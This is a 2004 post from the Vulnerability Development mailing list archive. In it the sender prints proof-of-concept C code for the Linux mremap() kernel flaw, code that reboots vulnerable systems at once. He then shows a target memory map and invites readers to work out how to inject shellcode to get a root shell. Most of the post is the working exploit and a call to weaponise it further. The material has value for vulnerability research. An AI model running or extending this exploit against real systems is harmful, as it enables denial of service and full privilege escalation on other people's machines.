Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Any takers? Revisiting mremap()

From: "Jeremy Junginger" <jj () act com>
Date: Tue, 6 Jan 2004 15:12:28 -0700
"Proof-of-concept exploit code has been created and successfully tested
giving UID 0 shell on vulnerable systems"

POC Code (Causes instantaneous reboot on affected systems):
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    fork();

    return( 0 );
}

Target VMA (depicted by *):

    08048000-0804c000 r-xp 00000000 03:05 959142     /tmp/test
    0804c000-0804d000 rw-p 00003000 03:05 959142     /tmp/test
    0804d000-0804e000 rwxp 00000000 00:00 0
    40000000-40014000 r-xp 00000000 03:05 1544523    /lib/ld-2.3.2.so
    40014000-40015000 rw-p 00013000 03:05 1544523    /lib/ld-2.3.2.so
    40015000-40016000 rw-p 00000000 00:00 0
    4002c000-40158000 r-xp 00000000 03:05 1544529    /lib/libc.so.6
    40158000-4015d000 rw-p 0012b000 03:05 1544529    /lib/libc.so.6
    4015d000-4015f000 rw-p 00000000 00:00 0
[*] 60000000-60000000 rwxp 00000000 00:00 0
    bfffe000-c0000000 rwxp fffff000 00:00 0

Question:  Given the PoC and Target VMA, does anyone see potential to inject
your shellcode of choice?  Heheh...

-Jeremy


This e-mail message and all attachments transmitted with it may be confidential 
and are intended solely for the addressee(s). If you are not the intended recipient
or the person responsible for delivering it to the intended recipient, you are
hereby notified that any reading, dissemination, distribution, copying, or other 
use of this message or its attachment(s) is strictly prohibited.  If you receive 
this email in error, please immediately notify the sender of the message or 
Best Software, Inc. by e-mailing postmaster () bestsoftware com and destroy all copies 
of this message.  Best Software, for the protection of our internal systems and 
those of our customers, does block most email attachments.
Previous By Date Next
Previous By Thread Next

Current thread: